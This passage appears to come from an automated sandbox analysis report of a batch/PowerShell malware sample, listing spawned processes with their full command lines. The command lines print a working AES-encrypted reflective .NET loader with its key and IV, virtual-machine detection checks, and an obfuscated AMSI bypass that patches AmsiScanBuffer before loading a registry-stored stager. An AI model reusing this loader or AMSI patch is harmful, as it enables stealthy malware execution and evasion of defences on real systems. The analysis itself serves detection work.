(blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            With the 'blck' filler stripped by .Replace('blck', ''), the echoed script is a two-stage loader: it reads 1.cmd itself, takes the first line beginning with ':: ', splits it on '\' into two blobs, and for each blob base64-decodes it, decrypts it with AES-CBC/PKCS7 under the hardcoded key and IV, gunzips it through System.IO.Compression.GZipStream, loads the result with System.Reflection.Assembly::Load and calls EntryPoint.Invoke. The batch comment line, the AES key and IV, and the Invoke-Expression/Replace pattern are the detection-relevant artifacts.
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:03:42:02
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:03:42:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:16
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:17
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:03:42:33
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff72bec0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:20
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:21
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:03:42:34
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Manufacturer,Model
                            Imagebase:0x7ff78ee20000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:03:42:35
                            Start date:04/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                            Imagebase:0x7ff624f90000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                            This is the same AES-CBC, gunzip and Assembly::Load loader as Target ID 6, with the same key and IV, now reading its payload from the copy the sample dropped at C:\Windows\$rbx-onimai2\$rbx-CO2.bat, i.e. the persisted second run rather than the original 1.cmd.
                            Imagebase:0x7ff7183f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:03:42:57
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:28
                            Start time:03:43:03
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
                            Imagebase:0x7ff79b100000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                            Imagebase:0x7ff76f990000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:03:43:08
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                            Imagebase:0x330000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char
](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:03:43:11
                            Start date:04/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dllhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
                            Imagebase:0x7ff70f330000
                            File size:21'312 bytes
                            MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:39
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\winlogon.exe
                            Wow64 process (32bit):false
                            Commandline:winlogon.exe
                            Imagebase:0x7ff7cd660000
                            File size:906'240 bytes
                            MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:40
                            Start time:03:43:13
                            Start date:04/10/2024
                            Path:C:\Windows\System32\lsass.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\lsass.exe
                            Imagebase:0x7ff7a2ae0000
                            File size:59'456 bytes
                            MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:41
                            Start time:03:43:14
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:42
                            Start time:03:43:15
                            Start date:04/10/2024
                            Path:C:\Windows\System32\dwm.exe
                            Wow64 process (32bit):false
                            Commandline:"dwm.exe"
                            Imagebase:0x7ff74e710000
                            File size:94'720 bytes
                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:43
                            Start time:03:43:16
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:44
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:45
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\wbem\WMIADAP.exe
                            Wow64 process (32bit):false
                            Commandline:wmiadap.exe /F /T /R
                            Imagebase:0x7ff7fb760000
                            File size:182'272 bytes
                            MD5 hash:1BFFABBD200C850E6346820E92B915DC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:46
                            Start time:03:43:17
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:47
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:48
                            Start time:03:43:18
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:49
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:50
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:51
                            Start time:03:43:20
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:52
                            Start time:03:43:21
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:53
                            Start time:03:43:22
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:54
                            Start time:03:43:23
                            Start date:04/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
